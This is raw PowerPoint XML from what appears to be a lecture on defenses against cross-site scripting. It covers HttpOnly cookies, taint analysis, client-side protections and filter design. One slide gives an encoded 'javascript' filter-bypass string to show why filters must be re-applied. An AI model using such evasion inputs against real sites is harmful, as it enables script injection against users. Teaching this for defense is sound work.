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94"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460" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="81" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="-244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CD7AF-71AA-43F8-9F2D-A5A8AAF41561}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3/19/2017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F74668-F67F-4105-9562-513E3D17A84C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="930998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14316"/>
            <a:fld id="{1C4C3A0A-69B9-427D-B48D-A26349689D6A}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="914316"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71684" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>FF2, Chrome:    HttpOnly cookie can be overwritten to by script    (but cannot be read)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="134540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43000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64515" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This slide shows another situation, in which a social networking site allows users to build and upload their own applications. If these applications are unrestricted JavaScript that runs on the users browser, then the JavaScript from an application could read user information, act as the user (such as post to other comment walls), or interfere with the site in other ways.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64516" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914316"/>
            <a:fld id="{160F6800-698E-4ED4-A4B9-A0AAFB4B2E23}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="914316"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="48259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35FE0D-6765-4D80-8DBE-004483E3433E}"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5FE0D-6765-4D80-8DBE-004483E3433E}"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5FE0D-6765-4D80-8DBE-004483E3433E}"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5FE0D-6765-4D80-8DBE-004483E3433E}"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35FE0D-6765-4D80-8DBE-004483E3433E}"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35FE0D-6765-4D80-8DBE-004483E3433E}"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35FE0D-6765-4D80-8DBE-004483E3433E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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35FE0D-6765-4D80-8DBE-004483E3433E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3/19/2017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5FE0D-6765-4D80-8DBE-004483E3433E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3/19/2017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5FE0D-6765-4D80-8DBE-004483E3433E}"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5FE0D-6765-4D80-8DBE-004483E3433E}"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DE5F-0A50-4B4C-A44C-F4E5D10DCA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5FE0D-6765-4D80-8DBE-004483E3433E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3/19/2017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1DE5F-0A50-4B4C-A44C-F4E5D10DCA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6.4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defenses and Protections against XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="175553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1371600" y="4724400"/>
            <a:ext cx="2743200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3962400"/>
            <a:ext cx="2133600" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54276" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>But watch out for tricky cases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54277" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="7848600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Previous filter works on some input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Try it at http://kallahar.com/smallprojects/php_xss_filter_function.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>But consider this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   java&amp;#x09;script    Blocked;   &amp;#x09 is horizontal tab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   java&amp;#x26;#x09;script   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>  java&amp;#x09;script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Instead of blocking this input, it is transformed to an attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t>Need to loop and reapply filter to output until nothing found</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Advanced anti-XSS tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Dynamic Data Tainting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Perl taint mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Static Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Analyze Java, PHP to determine possible flow of untrusted input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Client-side XSS defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Proxy-based: analyze the HTTP traffic exchanged between user’s web browser and the target web server by scanning for special HTML characters and encoding them before executing the page on the user’s web browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Application-level firewall: analyze browsed HTML pages for hyperlinks that might lead to leakage of sensitive information and stop bad requests using a set of connection rules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Auditing system: monitor execution of JavaScript code and compare the operations against high-level policies to detect malicious behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="200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609600" y="152400"/>
            <a:ext cx="7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>HttpOnly Cookies    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> IE6 SP1,   FF2.0.0.5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345541" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447802" y="1692275"/>
            <a:ext cx="1128713" cy="8382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solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345542" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="1792288"/>
            <a:ext cx="914400" cy="6096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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345543" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2530475"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 166667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345544" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2759075"/>
            <a:ext cx="1143000" cy="1524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solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345545" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="2525713"/>
            <a:ext cx="400050" cy="385763"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="252" y="81"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="249" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="147"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="252" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345546" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="1616075"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 26074"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345547" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2073275"/>
            <a:ext cx="3581400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345548" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3874720" y="1600201"/>
            <a:ext cx="864339" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>GET …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345549" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2301875"/>
            <a:ext cx="3581400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345550" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2362201"/>
            <a:ext cx="4800600" cy="1034129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>HTTP Header:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Set-cookie:	NAME=VALUE ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345565" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457202" y="3810001"/>
